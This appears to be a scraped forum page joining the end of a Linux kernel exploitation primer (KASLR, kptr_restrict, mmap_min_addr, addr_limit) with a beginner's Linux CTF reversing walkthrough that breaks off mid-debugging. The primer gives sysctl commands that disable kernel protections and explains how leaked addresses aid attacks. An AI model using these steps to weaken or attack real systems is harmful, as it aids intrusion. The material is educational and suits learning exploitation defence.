segments(Exception table, text, data…) at each restart(boot), we’ve previously disabled it by using the nokaslr at the kernel command line. In order to experiment on it, this was removed and specific symbols in /proc/kallsyms were then fetched on two different runs. First run: Second run: This shows that addresses are randomly assigned on boottime to _stext and _sdata, whereas their end is just the start address plus a size which doesn’t change in this case(0x21dc0 for .data, 0x6184d1 for .text), note that .data is on a constant distance from .text. So if the attacker gets the .text base address(which is the result of a leak), he can know the location of all the kernel symbols even with no access to kallsyms using RVAs(or offsets), but he’ll have to compile the target kernel in his box to get them. This is for example used when SMEP is on and one has to go for ROP to disable it first, and then redirect execution to a shellcode placed in userspace(< TASK_SIZE). kptr_restrict: This protection prevents kernel addresses from being exposed to the attacker. It does stop %pK format from dumping an address, and it’s work depends on the kptr_restrict value(0, 1 or 2). Kernel Pointers: %pK 0x01234567 or 0x0123456789abcdef For printing kernel pointers which should be hidden from unprivileged users. The behaviour of %pK depends on the kptr_restrict sysctl - see Documentation/sysctl/kernel.txt for more details. This can be seen in kprobe_blacklist_seq_show() which performs a check with a call to kallsyms_show_value(), depending on it, it would or would not print the start and end addresses. static int kprobe_blacklist_seq_show(struct seq_file *m, void *v) { struct kprobe_blacklist_entry *ent = list_entry(v, struct kprobe_blacklist_entry, list); if (!kallsyms_show_value()) seq_printf(m, "0x%px-0x%px\t%ps\n", NULL, NULL, (void *)ent->start_addr); else seq_printf(m, "0x%px-0x%px\t%ps\n", (void *)ent->start_addr, (void *)ent->end_addr, (void *)ent->start_addr); return 0; } What kallsyms_show_value() does is shown here: int kallsyms_show_value(void) { switch (kptr_restrict) { case 0: if (kallsyms_for_perf()) return 1; case 1: if (has_capability_noaudit(current, CAP_SYSLOG)) return 1; default: return 0; } } If kptr_restrict value is 0, it does call kallsyms_for_perf() to check if sysctl_perf_event_paranoid value is smaller or equal to 1, returns 1 if true. If it’s 1, it checks if CAP_SYSLOG is within the user’s capabilities, if true, it returns 1. Otherwise, it returns 0. Disabling this protection can be done by setting /proc/sys/kernel/kptr_restrict content to 0. Or using sysctl to do that: sysctl -w kernel.kptr_restrict=0 But watchout for perf_event_paranoid too, if it’s > 1, then it needs to be adjusted. This is an example on the default kernel run by my Debian VM: user@Nwwz:~$ cd /proc/self user@Nwwz:/proc/self$ cat stack [<ffffffff81e7c869>] do_wait+0x1c9/0x240 [<ffffffff81e7d9ab>] SyS_wait4+0x7b/0xf0 [<ffffffff81e7b550>] task_stopped_code+0x50/0x50 [<ffffffff81e03b7d>] do_syscall_64+0x8d/0xf0 [<ffffffff8241244e>] entry_SYSCALL_64_after_swapgs+0x58/0xc6 [<ffffffffffffffff>] 0xffffffffffffffff However, in the 4.17 kernel, we get this, because of perf_event_paranoid: root@Nwwz:~# cd /proc/self root@Nwwz:/proc/self# cat stack [<0>] do_wait+0x1c9/0x240 [<0>] kernel_wait4+0x8d/0x140 [<0>] __do_sys_wait4+0x95/0xa0 [<0>] do_syscall_64+0x55/0x100 [<0>] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [<0>] 0xffffffffffffffff root@Nwwz:/proc/self# cat /proc/sys/kernel/kptr_restrict 0 root@Nwwz:/proc/self# cat /proc/sys/kernel/perf_event_paranoid 2 mmap_min_addr: The mm_struct within task_struct holds an operation function called get_unmapped_area. struct mm_struct { ... #ifdef CONFIG_MMU unsigned long (*get_unmapped_area) (struct file *filp, unsigned long addr, unsigned long len, unsigned long pgoff, unsigned long flags); #endif ... } It is then extracted in get_unmapped_area(), which tries to get it from the mm(mm_struct), before checking it’s file and it’s file_operations or if it has the MAP_SHARED flag and assign shmem_get_unmapped_area() to it. However, within the mm_struct, the default value of get_unmapped_area is the arch specific function. This function does search for a large enough memory block to satisfy the request, but before returning the addr, it does check if it’s bigger or equal to mmap_min_addr, which means that any address below it will not be given, this prevents NULL pointer dereference attack from happening(no mmaping NULL address, nothing will be stored there(shellcode, pointers…)). Disabling this protection can be done by setting /proc/sys/vm/mmap_min_addr content to 0, or using sysctl like before. sysctl -w vm.mmap_min_addr=0 addr_limit: The thread(thread_struct) within the task_struct contains some important fields, amongst them, is the addr_limit. typedef struct { unsigned long seg; } mm_segment_t; struct thread_struct { ... mm_segment_t addr_limit; unsigned int sig_on_uaccess_err:1; unsigned int uaccess_err:1; ... }; This can be read with a call to get_fs(), changed with set_fs(): #define MAKE_MM_SEG(s) ((mm_segment_t) { (s) }) #define KERNEL_DS MAKE_MM_SEG(-1UL) #define USER_DS MAKE_MM_SEG(TASK_SIZE_MAX) #define get_ds() (KERNEL_DS) #define get_fs() (current->thread.addr_limit) static inline void set_fs(mm_segment_t fs) { current->thread.addr_limit = fs; set_thread_flag(TIF_FSCHECK); } When userspace likes to reach an address, it is checked against this first, so overwritting it with -1UL(KERNEL_DS) would let you access(read or write) to kernelspace. This was the introduction, I’ve noticed that it has grown bigger than I expected, so I stopped, and removed parts about protections 4, side-channel 2 attacks 3 and others. Starting this was possible, thanks to: @_py(DA BEST), @pry0cc, @Evalion, @4w1il, @ricksanchez and @Leeky. See y’all in part 1, peace. “nothing is enough, search more to learn more”. ~ exploit Sursa: https://0x00sec.org/t/point-of-no-c3-linux-kernel-exploitation-part-0/11585
-
- 1
-
-
Linux Reverse Engineering CTFs for Beginners After a while, I decided a write a short blog post about Linux binary reversing CTFs in general. How to approach a binary and solving for beginners. I personally am not a fan of Linux reverse engineering challenges in general, since I focus more time on Windows reversing. I like windows reverse engineering challenges more. A reason me liking Windows is as a pentester daily I encounter Windows machines and it’s so rare I come across an entire network running Linux. Even when it comes to exploit development it’s pretty rare you will manually develop an exploit for a Linux software while pentesting. But this knowledge is really useful when it comes to IoT, since almost many devices are based on Linux embedded. If you want to begin reverse engineering and exploit development starting from Linux would be a good idea. I too started from Linux many years ago. Saying that since some people when they see a reverse engineering challenge they try to run away. So if you are a newbie I hope this content might be useful for you to begin with. The ELF Format Let’s first have a look at the ELF headers. The best way to learn more about this in detail is to check the man pages for ELF. Here’s in more detail. The “e_shoff” member holds the offset to the section header table. The “sh_offset” member holds the address to the section’s first byte. +-------------------+ | ELF header |---+ +---------> +-------------------+ | e_shoff | | |<--+ | Section | Section header 0 | | | |---+ sh_offset | Header +-------------------+ | | | Section header 1 |---|--+ sh_offset | Table +-------------------+ | | | | Section header 2 |---|--|--+ +---------> +-------------------+ | | | | Section 0 |<--+ | | +-------------------+ | | sh_offset | Section 1 |<-----+ | +-------------------+ | | Section 2 |<--------+ +-------------------+ Executable Header Any ELF file starts with an executable header. This contains information about which type of an ELF file, the offsets to different headers. Everything is self-explanatory if you look at the comments. For this example, I am using 32-bit structures. For x86_64 the sizes may change and the naming convention would start with “Elf64_”. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 #define EI_NIDENT (16) typedef struct { unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */ Elf32_Half e_type; /* Object file type */ Elf32_Half e_machine; /* Architecture */ Elf32_Word e_version; /* Object file version */ Elf32_Addr e_entry; /* Entry point virtual address */ Elf32_Off e_phoff; /* Program header table file offset */ Elf32_Off e_shoff; /* Section header table file offset */ Elf32_Word e_flags; /* Processor-specific flags */ Elf32_Half e_ehsize; /* ELF header size in bytes */ Elf32_Half e_phentsize; /* Program header table entry size */ Elf32_Half e_phnum; /* Program header table entry count */ Elf32_Half e_shentsize; /* Section header table entry size */ Elf32_Half e_shnum; /* Section header table entry count */ Elf32_Half e_shstrndx; /* Section header string table index */ } Elf32_Ehdr; This is an example using readelf. # readelf -h /bin/ls ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2's complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: DYN (Shared object file) Machine: Advanced Micro Devices X86-64 Version: 0x1 Entry point address: 0x6130 Start of program headers: 64 (bytes into file) Start of section headers: 137000 (bytes into file) Flags: 0x0 Size of this header: 64 (bytes) Size of program headers: 56 (bytes) Number of program headers: 11 Size of section headers: 64 (bytes) Number of section headers: 29 Section header string table index: 28 To calculate the size of the entire binary we can use the following calculation size = e_shoff + (e_shnum * e_shentsize) size = Start of section headers + (Number of section headers * Size of section headers) size = 137000 + (29*64) = 138856 As you can see our calculation is correct. # ls -l /bin/ls -rwxr-xr-x 1 root root 138856 Aug 29 21:20 /bin/ls Program Headers These headers describe the segments of the binary which important for the loading of the binary. This information is useful for the kernel to map the segments to memory from disk. The members of the structure are self-explanatory. I won’t be explaining in depth about this for this post as I try to keep things basic. However, every section is important to understand in doing cool things in reverse engineering in ELF 1 2 3 4 5 6 7 8 9 10 typedef struct { Elf32_Word p_type; /* Segment type */ Elf32_Off p_offset; /* Segment file offset */ Elf32_Addr p_vaddr; /* Segment virtual address */ Elf32_Addr p_paddr; /* Segment physical address */ Elf32_Word p_filesz; /* Segment size in file */ Elf32_Word p_memsz; /* Segment size in memory */ Elf32_Word p_flags; /* Segment flags */ Elf32_Word p_align; /* Segment alignment */ } Elf32_Phdr; Section Headers These headers contain the information for the binary’s segments. It references the size, location for linking and debugging purposes. These headers are not really important for the execution flow of the binary. In some cases, this is stripped and tools like gdb, objdump are useless as they rely on these headers to locate symbol information. 1 2 3 4 5 6 7 8 9 10 11 12 typedef struct { Elf32_Word sh_name; /* Section name (string tbl index) */ Elf32_Word sh_type; /* Section type */ Elf32_Word sh_flags; /* Section flags */ Elf32_Addr sh_addr; /* Section virtual addr at execution */ Elf32_Off sh_offset; /* Section file offset */ Elf32_Word sh_size; /* Section size in bytes */ Elf32_Word sh_link; /* Link to another section */ Elf32_Word sh_info; /* Additional section information */ Elf32_Word sh_addralign; /* Section alignment */ Elf32_Word sh_entsize; /* Entry size if section holds table */ } Elf32_Shdr; Sections As any binary, these are the sections. Some sections are familiar with the PE’s headers. However, I won’t be discussing all the sections as I try to keep it basic. .bss Section This section contains the program’s uninitialized global data. .data Section This section contains the program’s initialized global variables. .rodata Section This section contains read-only data such as strings of the program used. .text Section This section contains the program’s actual code, the logic flow. # readelf -S --wide /bin/ls There are 29 section headers, starting at offset 0x21728: Section Headers: [Nr] Name Type Address Off Size ES Flg Lk Inf Al [ 0] NULL 0000000000000000 000000 000000 00 0 0 0 [ 1] .interp PROGBITS 00000000000002a8 0002a8 00001c 00 A 0 0 1 [ 2] .note.ABI-tag NOTE 00000000000002c4 0002c4 000020 00 A 0 0 4 [ 3] .note.gnu.build-id NOTE 00000000000002e4 0002e4 000024 00 A 0 0 4 [ 4] .gnu.hash GNU_HASH 0000000000000308 000308 0000c0 00 A 5 0 8 [ 5] .dynsym DYNSYM 00000000000003c8 0003c8 000c90 18 A 6 1 8 [ 6] .dynstr STRTAB 0000000000001058 001058 0005d8 00 A 0 0 1 [ 7] .gnu.version VERSYM 0000000000001630 001630 00010c 02 A 5 0 2 [ 8] .gnu.version_r VERNEED 0000000000001740 001740 000070 00 A 6 1 8 [ 9] .rela.dyn RELA 00000000000017b0 0017b0 001350 18 A 5 0 8 [10] .rela.plt RELA 0000000000002b00 002b00 0009f0 18 AI 5 24 8 [11] .init PROGBITS 0000000000004000 004000 000017 00 AX 0 0 4 [12] .plt PROGBITS 0000000000004020 004020 0006b0 10 AX 0 0 16 [13] .plt.got PROGBITS 00000000000046d0 0046d0 000018 08 AX 0 0 8 [14] .text PROGBITS 00000000000046f0 0046f0 01253e 00 AX 0 0 16 [15] .fini PROGBITS 0000000000016c30 016c30 000009 00 AX 0 0 4 [16] .rodata PROGBITS 0000000000017000 017000 005129 00 A 0 0 32 [17] .eh_frame_hdr PROGBITS 000000000001c12c 01c12c 0008fc 00 A 0 0 4 [18] .eh_frame PROGBITS 000000000001ca28 01ca28 002ed0 00 A 0 0 8 [19] .init_array INIT_ARRAY 0000000000021390 020390 000008 08 WA 0 0 8 [20] .fini_array FINI_ARRAY 0000000000021398 020398 000008 08 WA 0 0 8 [21] .data.rel.ro PROGBITS 00000000000213a0 0203a0 000a38 00 WA 0 0 32 [22] .dynamic DYNAMIC 0000000000021dd8 020dd8 0001f0 10 WA 6 0 8 [23] .got PROGBITS 0000000000021fc8 020fc8 000038 08 WA 0 0 8 [24] .got.plt PROGBITS 0000000000022000 021000 000368 08 WA 0 0 8 [25] .data PROGBITS 0000000000022380 021380 000268 00 WA 0 0 32 [26] .bss NOBITS 0000000000022600 0215e8 0012d8 00 WA 0 0 32 [27] .gnu_debuglink PROGBITS 0000000000000000 0215e8 000034 00 0 0 4 [28] .shstrtab STRTAB 0000000000000000 02161c 00010a 00 0 0 1 Key to Flags: W (write), A (alloc), X (execute), M (merge), S (strings), I (info), L (link order), O (extra OS processing required), G (group), T (TLS), C (compressed), x (unknown), o (OS specific), E (exclude), l (large), p (processor specific) Solving a Basic CTF Challenge Now that you have a basic understanding about the headers, let’s pick a random challenge CTF and explire. Download the binary from here. When we pass in some random string we get [+] No flag for you. [+] text displayed. # ./nix_5744af788e6cbdb29bb41e8b0e5f3cd5 aaaa [+] No flag for you. [+] Strings Let’s start by having a look at strings and see any interesting strings. # strings nix_5744af788e6cbdb29bb41e8b0e5f3cd5 /lib/ld-linux.so.2 Mw1i#'0 libc.so.6 _IO_stdin_used exit sprintf puts strlen __cxa_finalize __libc_start_main GLIBC_2.1.3 Y[^] [^_] UWVS [^_] Usage: script.exe <key> Length of argv[1] too long. [+] The flag is: SAYCURE{%s} [+] [+] No flag for you. [+] %c%c%c%c%c%c%c%c%c%c%c%c%c%c%c ;*2$" GCC: (Debian 8.2.0-8) 8.2.0 crtstuff.c We found all the strings printed out from the binary. The “%c” is the format string where our flag gets printed, we can determine the flag must be of 15 characters. Usage: script.exe Length of argv[1] too long. [+] The flag is: SAYCURE{%s} [+] [+] No flag for you. [+] %c%c%c%c%c%c%c%c%c%c%c%c%c%c%c We can get a better view of these strings if we look at the ‘.rodata’ section with the offsets. # readelf -x .rodata nix_5744af788e6cbdb29bb41e8b0e5f3cd5 Hex dump of section '.rodata': 0x00002000 03000000 01000200 55736167 653a2073 ........Usage: s 0x00002010 63726970 742e6578 65203c6b 65793e00 cript.exe <key>. 0x00002020 4c656e67 7468206f 66206172 67765b31 Length of argv[1 0x00002030 5d20746f 6f206c6f 6e672e00 5b2b5d20 ] too long..[+] 0x00002040 54686520 666c6167 2069733a 20534159 The flag is: SAY 0x00002050 43555245 7b25737d 205b2b5d 0a000a5b CURE{%s} [+]...[ 0x00002060 2b5d204e 6f20666c 61672066 6f722079 +] No flag for y 0x00002070 6f752e20 5b2b5d00 25632563 25632563 ou. [+].%c%c%c%c 0x00002080 25632563 25632563 25632563 25632563 %c%c%c%c%c%c%c%c 0x00002090 25632563 256300 %c%c%c. Checking for Symbols By checking the symbols of the binary we can realize it uses printf, puts, sprintf, strlen functions. # nm -D nix_5744af788e6cbdb29bb41e8b0e5f3cd5 w __cxa_finalize U exit w __gmon_start__ 00002004 R _IO_stdin_used w _ITM_deregisterTMCloneTable w _ITM_registerTMCloneTable U __libc_start_main U printf U puts U sprintf U strlen Tracing System Calls We can use tools such as strace to trace the system calls used by the program. # strace ./nix_5744af788e6cbdb29bb41e8b0e5f3cd5 aaaa execve("./nix_5744af788e6cbdb29bb41e8b0e5f3cd5", ["./nix_5744af788e6cbdb29bb41e8b0e"..., "aaaa"], 0x7ffd5ff92d18 /* 46 vars */) = 0 strace: [ Process PID=59965 runs in 32 bit mode. ] brk(NULL) = 0x56f14000 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf7ef0000 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=220471, ...}) = 0 mmap2(NULL, 220471, PROT_READ, MAP_PRIVATE, 3, 0) = 0xf7eba000 close(3) = 0 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) openat(AT_FDCWD, "/lib/i386-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3 read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0 \233\1\0004\0\0\0"..., 512) = 512 fstat64(3, {st_mode=S_IFREG|0755, st_size=1930924, ...}) = 0 mmap2(NULL, 1940000, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xf7ce0000 mprotect(0xf7cf9000, 1814528, PROT_NONE) = 0 mmap2(0xf7cf9000, 1359872, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x19000) = 0xf7cf9000 mmap2(0xf7e45000, 450560, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x165000) = 0xf7e45000 mmap2(0xf7eb4000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1d3000) = 0xf7eb4000 mmap2(0xf7eb7000, 10784, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xf7eb7000 close(3) = 0 set_thread_area({entry_number=-1, base_addr=0xf7ef10c0, limit=0x0fffff, seg_32bit=1, contents=0, read_exec_only=0, limit_in_pages=1, seg_not_present=0, useable=1}) = 0 (entry_number=12) mprotect(0xf7eb4000, 8192, PROT_READ) = 0 mprotect(0x5664d000, 4096, PROT_READ) = 0 mprotect(0xf7f1e000, 4096, PROT_READ) = 0 munmap(0xf7eba000, 220471) = 0 fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0x2), ...}) = 0 brk(NULL) = 0x56f14000 brk(0x56f35000) = 0x56f35000 brk(0x56f36000) = 0x56f36000 write(1, "\n", 1 ) = 1 write(1, "[+] No flag for you. [+]\n", 25[+] No flag for you. [+] ) = 25 exit_group(26) = ? +++ exited with 26 +++ To get a better understanding, we can use ltrace to trace the library calls made by demangling C++ function names. We can see there is a string length check being done. # ltrace -i -C ./nix_5744af788e6cbdb29bb41e8b0e5f3cd5 aaaaaaaa [0x565570e1] __libc_start_main(0x565571e9, 2, 0xffe3a584, 0x56557400 <unfinished ...> [0x56557249] strlen("aaaaaaaa") = 8 [0x565572ca] puts("\n[+] No flag for you. [+]" [+] No flag for you. [+] ) = 26 [0xffffffffffffffff] +++ exited (status 26) +++ Disassembling the Text Section Let’s have a look at the .text section’s disassembly and try to understand. In this binary the symbols are not stripped so we can see the function names which makes it easier to understand. If you can read assembly by now you will have figure out what is happening. If not let’s do some live debugging and try to understand better. root@Omega:/mnt/hgfs/shared/Linux RE# objdump -D -M intel -j .text nix_5744af788e6cbdb29bb41e8b0e5f3cd5 nix_5744af788e6cbdb29bb41e8b0e5f3cd5: file format elf32-i386 Disassembly of section .text: 000010b0 <_start>: 10b0: 31 ed xor ebp,ebp 10b2: 5e pop esi 10b3: 89 e1 mov ecx,esp 10b5: 83 e4 f0 and esp,0xfffffff0 10b8: 50 push eax 10b9: 54 push esp 10ba: 52 push edx 10bb: e8 22 00 00 00 call 10e2 <_start+0x32> 10c0: 81 c3 40 2f 00 00 add ebx,0x2f40 10c6: 8d 83 60 d4 ff ff lea eax,[ebx-0x2ba0] 10cc: 50 push eax 10cd: 8d 83 00 d4 ff ff lea eax,[ebx-0x2c00] 10d3: 50 push eax 10d4: 51 push ecx 10d5: 56 push esi 10d6: ff b3 f8 ff ff ff push DWORD PTR [ebx-0x8] 10dc: e8 9f ff ff ff call 1080 <__libc_start_main@plt> 10e1: f4 hlt 10e2: 8b 1c 24 mov ebx,DWORD PTR [esp] 10e5: c3 ret 10e6: 66 90 xchg ax,ax 10e8: 66 90 xchg ax,ax 10ea: 66 90 xchg ax,ax 10ec: 66 90 xchg ax,ax 10ee: 66 90 xchg ax,ax ... Output Omitted ... 000011e9 <main>: 11e9: 8d 4c 24 04 lea ecx,[esp+0x4] 11ed: 83 e4 f0 and esp,0xfffffff0 11f0: ff 71 fc push DWORD PTR [ecx-0x4] 11f3: 55 push ebp 11f4: 89 e5 mov ebp,esp 11f6: 56 push esi 11f7: 53 push ebx 11f8: 51 push ecx 11f9: 83 ec 1c sub esp,0x1c 11fc: e8 ef fe ff ff call 10f0 <__x86.get_pc_thunk.bx> 1201: 81 c3 ff 2d 00 00 add ebx,0x2dff 1207: 89 ce mov esi,ecx 1209: c7 45 e4 00 00 00 00 mov DWORD PTR [ebp-0x1c],0x0 1210: c7 45 dc 07 00 00 00 mov DWORD PTR [ebp-0x24],0x7 1217: 83 3e 02 cmp DWORD PTR [esi],0x2 121a: 74 1c je 1238 <main+0x4f> 121c: 83 ec 0c sub esp,0xc 121f: 8d 83 08 e0 ff ff lea eax,[ebx-0x1ff8] 1225: 50 push eax 1226: e8 15 fe ff ff call 1040 <printf@plt> 122b: 83 c4 10 add esp,0x10 122e: 83 ec 0c sub esp,0xc 1231: 6a 01 push 0x1 1233: e8 28 fe ff ff call 1060 <exit@plt> 1238: 8b 46 04 mov eax,DWORD PTR [esi+0x4] 123b: 83 c0 04 add eax,0x4 123e: 8b 00 mov eax,DWORD PTR [eax] 1240: 83 ec 0c sub esp,0xc 1243: 50 push eax 1244: e8 27 fe ff ff call 1070 <strlen@plt> 1249: 83 c4 10 add esp,0x10 124c: 83 f8 0f cmp eax,0xf 124f: 76 1c jbe 126d <main+0x84> 1251: 83 ec 0c sub esp,0xc 1254: 8d 83 20 e0 ff ff lea eax,[ebx-0x1fe0] 125a: 50 push eax 125b: e8 f0 fd ff ff call 1050 <puts@plt> 1260: 83 c4 10 add esp,0x10 1263: 83 ec 0c sub esp,0xc 1266: 6a 01 push 0x1 1268: e8 f3 fd ff ff call 1060 <exit@plt> 126d: c7 45 e0 00 00 00 00 mov DWORD PTR [ebp-0x20],0x0 1274: eb 1a jmp 1290 <main+0xa7> 1276: 8b 46 04 mov eax,DWORD PTR [esi+0x4] 1279: 83 c0 04 add eax,0x4 127c: 8b 10 mov edx,DWORD PTR [eax] 127e: 8b 45 e0 mov eax,DWORD PTR [ebp-0x20] 1281: 01 d0 add eax,edx 1283: 0f b6 00 movzx eax,BYTE PTR [eax] 1286: 0f be c0 movsx eax,al 1289: 01 45 e4 add DWORD PTR [ebp-0x1c],eax 128c: 83 45 e0 01 add DWORD PTR [ebp-0x20],0x1 1290: 8b 45 e0 mov eax,DWORD PTR [ebp-0x20] 1293: 3b 45 dc cmp eax,DWORD PTR [ebp-0x24] 1296: 7c de jl 1276 <main+0x8d> 1298: 81 7d e4 21 03 00 00 cmp DWORD PTR [ebp-0x1c],0x321 129f: 75 1a jne 12bb <main+0xd2> 12a1: e8 33 00 00 00 call 12d9 <comp_key> 12a6: 83 ec 08 sub esp,0x8 12a9: 50 push eax 12aa: 8d 83 3c e0 ff ff lea eax,[ebx-0x1fc4] 12b0: 50 push eax 12b1: e8 8a fd ff ff call 1040 <printf@plt> 12b6: 83 c4 10 add esp,0x10 12b9: eb 12 jmp 12cd <main+0xe4> 12bb: 83 ec 0c sub esp,0xc 12be: 8d 83 5e e0 ff ff lea eax,[ebx-0x1fa2] 12c4: 50 push eax 12c5: e8 86 fd ff ff call 1050 <puts@plt> 12ca: 83 c4 10 add esp,0x10 12cd: 90 nop 12ce: 8d 65 f4 lea esp,[ebp-0xc] 12d1: 59 pop ecx 12d2: 5b pop ebx 12d3: 5e pop esi 12d4: 5d pop ebp 12d5: 8d 61 fc lea esp,[ecx-0x4] 12d8: c3 ret 000012d9 <comp_key>: 12d9: 55 push ebp 12da: 89 e5 mov ebp,esp 12dc: 57 push edi 12dd: 56 push esi 12de: 53 push ebx 12df: 83 ec 7c sub esp,0x7c 12e2: e8 09 fe ff ff call 10f0 <__x86.get_pc_thunk.bx> 12e7: 81 c3 19 2d 00 00 add ebx,0x2d19 12ed: c7 45 e4 00 00 00 00 mov DWORD PTR [ebp-0x1c],0x0 12f4: c7 45 a8 4c 00 00 00 mov DWORD PTR [ebp-0x58],0x4c 12fb: c7 45 ac 33 00 00 00 mov DWORD PTR [ebp-0x54],0x33 1302: c7 45 b0 74 00 00 00 mov DWORD PTR [ebp-0x50],0x74 1309: c7 45 b4 73 00 00 00 mov DWORD PTR [ebp-0x4c],0x73 1310: c7 45 b8 5f 00 00 00 mov DWORD PTR [ebp-0x48],0x5f 1317: c7 45 bc 67 00 00 00 mov DWORD PTR [ebp-0x44],0x67 131e: c7 45 c0 33 00 00 00 mov DWORD PTR [ebp-0x40],0x33 1325: c7 45 c4 74 00 00 00 mov DWORD PTR [ebp-0x3c],0x74 132c: c7 45 c8 5f 00 00 00 mov DWORD PTR [ebp-0x38],0x5f 1333: c7 45 cc 69 00 00 00 mov DWORD PTR [ebp-0x34],0x69 133a: c7 45 d0 6e 00 00 00 mov DWORD PTR [ebp-0x30],0x6e 1341: c7 45 d4 32 00 00 00 mov DWORD PTR [ebp-0x2c],0x32 1348: c7 45 d8 5f 00 00 00 mov DWORD PTR [ebp-0x28],0x5f 134f: c7 45 dc 52 00 00 00 mov DWORD PTR [ebp-0x24],0x52 1356: c7 45 e0 33 00 00 00 mov DWORD PTR [ebp-0x20],0x33 135d: 8b 55 e0 mov edx,DWORD PTR [ebp-0x20] 1360: 8b 75 dc mov esi,DWORD PTR [ebp-0x24] 1363: 8b 45 d8 mov eax,DWORD PTR [ebp-0x28] 1366: 89 45 a4 mov DWORD PTR [ebp-0x5c],eax 1369: 8b 4d d4 mov ecx,DWORD PTR [ebp-0x2c] 136c: 89 4d a0 mov DWORD PTR [ebp-0x60],ecx 136f: 8b 7d d0 mov edi,DWORD PTR [ebp-0x30] 1372: 89 7d 9c mov DWORD PTR [ebp-0x64],edi 1375: 8b 45 cc mov eax,DWORD PTR [ebp-0x34] 1378: 89 45 98 mov DWORD PTR [ebp-0x68],eax 137b: 8b 4d c8 mov ecx,DWORD PTR [ebp-0x38] 137e: 89 4d 94 mov DWORD PTR [ebp-0x6c],ecx 1381: 8b 7d c4 mov edi,DWORD PTR [ebp-0x3c] 1384: 89 7d 90 mov DWORD PTR [ebp-0x70],edi 1387: 8b 45 c0 mov eax,DWORD PTR [ebp-0x40] 138a: 89 45 8c mov DWORD PTR [ebp-0x74],eax 138d: 8b 4d bc mov ecx,DWORD PTR [ebp-0x44] 1390: 89 4d 88 mov DWORD PTR [ebp-0x78],ecx 1393: 8b 7d b8 mov edi,DWORD PTR [ebp-0x48] 1396: 89 7d 84 mov DWORD PTR [ebp-0x7c],edi 1399: 8b 45 b4 mov eax,DWORD PTR [ebp-0x4c] 139c: 89 45 80 mov DWORD PTR [ebp-0x80],eax 139f: 8b 7d b0 mov edi,DWORD PTR [ebp-0x50] 13a2: 8b 4d ac mov ecx,DWORD PTR [ebp-0x54] 13a5: 8b 45 a8 mov eax,DWORD PTR [ebp-0x58] 13a8: 83 ec 0c sub esp,0xc 13ab: 52 push edx 13ac: 56 push esi 13ad: ff 75 a4 push DWORD PTR [ebp-0x5c] 13b0: ff 75 a0 push DWORD PTR [ebp-0x60] 13b3: ff 75 9c push DWORD PTR [ebp-0x64] 13b6: ff 75 98 push DWORD PTR [ebp-0x68] 13b9: ff 75 94 push DWORD PTR [ebp-0x6c] 13bc: ff 75 90 push DWORD PTR [ebp-0x70] 13bf: ff 75 8c push DWORD PTR [ebp-0x74] 13c2: ff 75 88 push DWORD PTR [ebp-0x78] 13c5: ff 75 84 push DWORD PTR [ebp-0x7c] 13c8: ff 75 80 push DWORD PTR [ebp-0x80] 13cb: 57 push edi 13cc: 51 push ecx 13cd: 50 push eax 13ce: 8d 83 78 e0 ff ff lea eax,[ebx-0x1f88] 13d4: 50 push eax 13d5: 8d 83 30 00 00 00 lea eax,[ebx+0x30] 13db: 50 push eax 13dc: e8 af fc ff ff call 1090 <sprintf@plt> 13e1: 83 c4 50 add esp,0x50 13e4: 8d 83 30 00 00 00 lea eax,[ebx+0x30] 13ea: 8d 65 f4 lea esp,[ebp-0xc] 13ed: 5b pop ebx 13ee: 5e pop esi 13ef: 5f pop edi 13f0: 5d pop ebp 13f1: c3 ret 13f2: 66 90 xchg ax,ax 13f4: 66 90 xchg ax,ax 13f6: 66 90 xchg ax,ax 13f8: 66 90 xchg ax,ax 13fa: 66 90 xchg ax,ax 13fc: 66 90 xchg ax,ax 13fe: 66 90 xchg ax,ax ... Output Omitted ... Debugging Live I will use GDB-Peda for this which makes it easier to understand. Let’s first check the functions in the binary. We can see functions such as main, comp_key gdb-peda$ info functions All defined functions: Non-debugging symbols: 0x00001000 _init 0x00001040 printf@plt 0x00001050 puts@plt 0x00001060 exit@plt 0x00001070 strlen@plt 0x00001080 __libc_start_main@plt 0x00001090 sprintf@plt 0x000010a0 __cxa_finalize@plt 0x000010a8 __gmon_start__@plt 0x000010b0 _start 0x000010f0 __x86.get_pc_thunk.bx 0x00001100 deregister_tm_clones 0x00001140 register_tm_clones 0x00001190 __do_global_dtors_aux 0x000011e0 frame_dummy 0x000011e5 __x86.get_pc_thunk.dx 0x000011e9 main 0x000012d9 comp_key 0x00001400 __libc_csu_init 0x00001460 __libc_csu_fini 0x00001464 _fini This is how you debug a program. We will hit a break point at the main function. Use n to step and ni to step each instruction. If you don’t know assembly, in a basic challenge like this, look for jumps, compare instructions. Try to understand what check the program does and build the logic in your mind. There are many good crash courses on assembly and I would recommend reading few. gdb-peda$ break main Breakpoint 1 at 0x11f9 gdb-peda$ run aaaaaaaa Starting program: /mnt/hgfs/shared/Linux RE/nix_5744af788e6cbdb29bb41e8b0e5f3cd5 aaaaaaaa [----------------------------------registers-----------------------------------] EAX: 0xf7f95dd8 --> 0xffffd2f0 --> 0xffffd4d1 ("NVM_DIR=/root/.nvm") EBX: 0x0 ECX: 0xffffd250 --> 0x2 EDX: 